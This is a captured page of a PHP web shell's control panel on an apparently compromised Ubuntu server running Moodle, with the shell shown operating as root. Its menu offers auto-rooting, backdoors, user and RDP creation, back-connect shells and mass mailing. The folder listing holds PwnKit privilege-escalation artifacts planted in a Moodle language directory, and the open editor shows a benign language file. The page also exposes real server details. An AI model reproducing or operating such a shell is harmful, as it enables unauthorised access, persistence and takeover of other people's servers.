Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
portfolio /
flickr /
lang /
en /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
portfolio_flickr.php
2.78
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : portfolio_flickr.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Strings for component 'portfolio_flickr', language 'en', branch 'MOODLE_20_STABLE' * * @package portfolio_flickr * @copyright 1999 onwards Martin Dougiamas {@link http://moodle.com} * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ $string['apikey'] = 'API key'; $string['contenttype'] = 'Content types'; $string['err_noapikey'] = 'No API key'; $string['err_noapikey_help'] = 'There is no API key configured for this plugin. You can get one of these from Flickr services page.'; $string['hidefrompublicsearches'] = 'Hide these images from public searches?'; $string['isfamily'] = 'Visible to family'; $string['isfriend'] = 'Visible to friends'; $string['ispublic'] = 'Public (anyone can see them)'; $string['moderate'] = 'Moderate'; $string['noauthtoken'] = 'Could not retrieve an authentication token for use in this session'; $string['other'] = 'Art, illustration, CGI, or other non-photographic images'; $string['photo'] = 'Photos'; $string['pluginname'] = 'Flickr.com'; $string['privacy:metadata'] = 'This plugin sends data externally to a linked Flickr account. It does not store data locally.'; $string['privacy:metadata:data'] = 'Personal data passed through from the portfolio subsystem.'; $string['restricted'] = 'Restricted'; $string['safe'] = 'Safe'; $string['safetylevel'] = 'Safety level'; $string['screenshot'] = 'Screenshots'; $string['set'] = 'Set'; $string['setupinfo'] = 'Setup instructions'; $string['setupinfodetails'] = 'To obtain API key and the secret string, log in to Flickr and <a href="{$a->applyurl}">apply for a new key</a>. Once new key and secret are generated for you, follow the \'Edit auth flow for this app\' link at the page. Select \'App Type\' to \'Web Application\'. Into the \'Callback URL\' field, put the value: <br /><code>{$a->callbackurl}</code><br />Optionally, you can also provide your Moodle site description and logo. These values can be set later at <a href="{$a->keysurl}">the page</a> listing your Flickr applications.'; $string['sharedsecret'] = 'Secret string'; $string['title'] = 'Title'; $string['uploadfailed'] = 'Failed to upload image(s) to flickr.com: {$a}';
Close